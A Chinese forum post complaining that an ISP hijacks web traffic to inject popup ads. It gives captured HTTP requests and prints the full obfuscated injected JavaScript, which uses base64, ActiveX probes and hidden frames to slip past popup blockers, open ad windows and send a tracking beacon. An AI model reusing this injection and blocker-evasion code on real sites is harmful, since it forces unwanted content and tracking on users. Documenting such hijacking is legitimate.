我访问网站甲
[url]http://im.qq.com/jh/[/url]
602 bytes sent to 219.134.128.12:80
GET /jh/ HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Host: im.qq.comConnection: Keep-AliveCookie: pvid=undefined; verifysession=462d275b013bb7edc97cc1b7d05e7ff2f5dcae8283b40c1a42c6b65ed603e72b; jp_session=1d8a81cf45c4a6cc68747470733a2f2f70617373776f72642e71712e636f6d2f6367692d62696e2f686a5f72656469726563743f773d31
返回了截持后的数据:530 bytes received by ***.***.***.***:3703
HTTP/1.1 200 OKContent-type: text/html
<html><meta http-equiv='Pragma' content='no-cache'><head><title></title><script LangUage='JavaScript'>try{var tmp=parent.window.location.href}catch(e){window.location.reload();}</script></head><frameset framespacing=0 border=0 rows='*,0' frameborder=0 οnlοad="window.lxmainframe.location='http://202.96.82.55/fx91/ifx91.html?url='+window.location;"><frame name='lxmainframe' src='about:blank' scrolling='auto'><frame name='lxblankframe' src='about:blank' scrolling='no'></frameset></html>
然后自动转向:
[url]http://202.96.82.55/fx91/ifx91.html?url=http://im.qq.com/jh/[/url]
GET /fx91/ifx91.html?url=http://im.qq.com/jh/ HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: [url]http://im.qq.com/jh/[/url]Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Host: 202.96.82.55Connection: Keep-Alive
最后取得的代码,居然用gzip加密,解密后为:HTTP/1.1 200 OKDate: Sun, 03 Feb 2007 05:18:10 GMTServer: Apache/2.0.54 (Unix) PHP/4.4.1Last-Modified: Tue, 19 Dec 2006 05:56:26 GMTETag: "400002-1c64-c2365680"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 3419Connection: closeContent-Type: text/html; charset=GB2312
< html > < head > < title ></ title > < meta http-equiv ="Content-Type" content ="text/html; charset=gb2312" > < style type ="text/css" > <!--body { margin : 0px ; padding : 0px ; overflow : hidden ; } --> </ style > < script language ="javascript" > function QueryString(fieldName){ var urlString = document.location.search; if (urlString != null ) { var typeQu = fieldName + " = " ; var urlEnd = urlString.indexOf(typeQu); if (urlEnd != - 1 ) { var paramsUrl = urlString.substring(urlEnd + typeQu.length); var isEnd = paramsUrl.indexOf( ' & ' ); if (isEnd != - 1 ) { return paramsUrl.substring( 0 , isEnd); } else { return paramsUrl; } } else return null ; } else return null ;} var url = QueryString( " url " ); </ script > </ head > < body > < iframe id ="fulliframe" LANG ="utf-8" name ="fulliframe" src ="" width ="100%" height ="100%" marginheight ="0" marginwidth ="0" frameborder ="0" ></ iframe > <!-- START IFRAME LOADING --> < script language ="JavaScript" type ="text/javascript" > frames[ ' fulliframe ' ].location = url; </ script > <!-- END IFRAME LOADING --> < SCRIPT LANGUAGE ="javascript" > oV1 = window; function fStart(u,n,v) { if ( ! oV1.opera) { var twin = oV1.open(u,n,v); oV1.focus(); } if ( ! window.fV1) {fV13();} var w = oV2(u,n,v); var wo = vWA[w]; wo.pw = twin; fV3( " fV10( " + w + " ) " , 100 ); return wo; } function fV11() { return fV6(vV1);} function fV5(x) { return true ; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array; var cw = vWA[c]; var tn = new Date(); if ( ! v) var v = '' ; if ( ! n) var n = tn.getTime(); cw.location = u; cw.f = 1 ; cw.s = 0 ; cw.n = n; cw.v = v; cw.cn = "" ; cw.cnt = c; cw.blur = function () {cw.f =- 1 ;}; cw.focus = function () {cw.f = 1 ;}; return c } function fV13() { oV5 = oV1.document; vWA = new Array; fV1 = oV1.open; fV2 = oV1.focus; fV3 = setTimeout; fV4 = clearTimeout; vV1 = ' PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F0aW9uL3htbCc+PC9PQkpFQ1Q+ ' ; fV20 = (document.all &&! oV1.opera) ? 1 : 0 ; isG = fV31 = fV32 = 0 ; fV21 = fV20 ? (navigator.appVersion.indexOf( ' NT 5.1 ' ) > 0 ): 0 ; fV34 = fV20 ? (navigator.appVersion.indexOf( ' MSIE 7 ' ) > 0 ): 0 ; oV5.write(fV6( ' PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uOmFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZlYxLDUsdHJ1ZSkiPg== ' )); oV5.write(fV6( ' PGRpdiBpZD0ib1YxMCI+PC9kaXY+ ' )); } function debug() { void ( 0 )} function fV6(input) { var o = "" ; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0 ; var keyStr = " ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/= " ; input = input.replace( / [ ^ A - Za - z0 - 9 + / = ] / g, "" ); do { enc1 = keyStr.indexOf(input.charAt(i ++ )); enc2 = keyStr.indexOf(input.charAt(i ++ )); enc3 = keyStr.indexOf(input.charAt(i ++ )); enc4 = keyStr.indexOf(input.charAt(i ++ )); chr1 = (enc1 << 2 ) | (enc2 >> 4 ); chr2 = ((enc2 & 15 ) << 4 ) | (enc3 >> 2 ); chr3 = ((enc3 & 3 ) << 6 ) | enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64 ) { o = o + String.fromCharCode(chr2); } if (enc4 != 64 ) { o = o + String.fromCharCode(chr3); } } while (i < input.length); return o; } function fV12() { if ( -- fV25 < 1 ) return ; oV1.onerror = fV5; var t = fV3( ' fV12() ' , 500 ); oV1.wO1 = oV3.oV4.object.parentWindow; oV3.location = fV6( ' YWJvdXQ6Ymxhbms= ' ); fV3( ' fV8(wO1.open,2) ' , 200 ); fV4(t); } function fV17() { if ( -- fV25 < 1 ) { fV25 = 25 ; var t = fV3( ' fV12() ' ); return ; } var x = fV3( ' fV17() ' , 250 ); oV1.fV14 = oV8.children[ 0 ].parentWindow; fV1 = fV14.open; fV4(x); oV8.removeChild(oV8.children[ 0 ]); oV5.all[ ' oV6 ' ].fireEvent( ' onchange ' ); } function fV16() { z = createPopup(); oV8 = z.document.body; oV8.innerHTML = fV6(vV1); fV25 = 5 ; fV3( ' fV17() ' , 200 ); } function fV19(v) { if (oV5.getElementById( ' oV10 ' )) { oV5.getElementById( ' oV10 ' ).innerHTML = v; } else { var o = oV5.createElement( " span " ); o.innerHTML = v; o.style.visibility = " visible " ; oV5.body.appendChild(o); } } function fV23() { fV8(fV1, 4 ); } function fV22() { if ( -- fV25 == 0 ) {fV21 = 0 ; fV7(); return ;} var wo = vWA[ 0 ]; var x = fV3( ' fV22() ' , 750 ); var o = fV24( ' oV9 ' ); if (o.DOM) { wo.s =- 1 ; fV4(x); fV25 = 1 ; eval(fV6( " dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbmVycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3NlKClcIiw1MCk7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXCIsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZWxwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0OjUwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KTsg " )); wo.s = 0 ; fV2(); fV3( ' fV23() ' ); } } function fV28() { fV19(fV6( ' PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMjU9MTwvU0NSSVBUPjwvb2JqZWN0Pg== ' )); fV25 = 6 ; fV3( ' fV22() ' , 500 ) } function fV26() { fV19(fV6( ' PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4= ' )); fV25 = 20 ; fV3( ' fV12() ' , 200 ); } function fV30() { fV3( ' fV32?fV29():fV28() ' ); var o = document.createElement( ' object ' ); o.onreadystatechange = function (){fV32 = 1 }; o.classid = ' clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD ' ; o.onreadystatechange = function (){fV32 = 0 }; } function fV29() { fV3( ' fV31?fV28():fV33() ' ); var o = document.createElement( ' object ' ); o.onreadystatechange = function (){fV31 = 1 }; o.classid = ' clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC ' ; o.onreadystatechange = function (){fV31 = 0 }; } function fV33() { fV3( ' isG?fV16():fV26(); ' ); var o = document.createElement( ' object ' ); o.onreadystatechange = function (){isG = 1 }; o.classid = ' clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB ' ; o.onreadystatechange = function (){isG = 0 }; } function fV7() { oV5.body.onclick = function () {fV8(oV1.open, 3 )}; if (oV5.createElement) { fV24 = oV5.getElementById; if (fV34) fV21 = 0 ; if (fV20) { if (fV21) { fV30(); } else { fV33(); } } else { out = ' <embed swliveconnect="true" src="" width="1" height="1"> ' ; fV19(out); if ( ! oV5.all) { x = oV5.getElementById( ' oV6 ' ); x.focus(); x.value = Math.random(); } } } } function fV8(f,t,y) { for ( var i = 0 ;i < vWA.length;i ++ ) if (vWA[i].s == 0 ) { vWA[i].s =- 1 ; var wo = vWA[i]; wo.pw = f(wo.location,wo.n,wo.v); fV3( " var i= " + i + " ; var wo=vWA[i]; if(wo.s==-1){wo.s=0} " ); fV9(wo,t); } } function fV9(wo,s) { if ( ! s) s = 0 ; if (wo.s > 1 ) return ; if (s == 0 ) var t = fV3( " fV7() " , 500 ); if (s == 4 ) var t = fV3( ' fV33() ' , 500 ); if (s == 5 && isG) var t = fV3( ' fV26() ' , 200 ); oV1.onerror = fV5; if (wo.pw) { if ( ! oV1.opera) {wo.f ==- 1 ? wo.pw.blur():wo.pw.focus();} wo.s = 2 ; fV2(); fV4(t); eval(fV6( ' CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KSB7DQoJCQl2YXIgeD1uZXcgSW1hZ2UoKTsNCgkJCXguc3JjPSdodHRwOi8vd3d3LmFkb3V0cHV0LmNvbS92ZXJzaW9uMi9oaXRfcm0uY2ZtP3R5cGU9JyArIHM7DQoJCX0= ' )); oV1.onerror = null ; } } function fV10(w) { if (oV1.opera && ! fV20) {fV7(); return ;} wo = vWA[w]; fV9(wo); } var l = (screen.width - 720 ) / 2 ; var t = (screen.height - 300 ) / 2 ; var pop = fStart( ' http://dm91.kulong8.com/120shop.htm ' , '' , ' height=600,width=800,left= ' + l + ' ,top= ' + t + ' ,toolbar=1,status=1,menubar=1,location=1,scrollbars=1,resizable=1 ' );pop.blur();window.focus(); </ SCRIPT > </ BODY > </ HTML >
以上弹窗代码凶悍异常,ggtoolbar拦截不住。
现在出现过的弹窗大概3种,一是有问必答网,一是健康商城,最近又多出来一个6room.
伟大的网通,让我们交钱看广告,真是前无古人,后无来者。
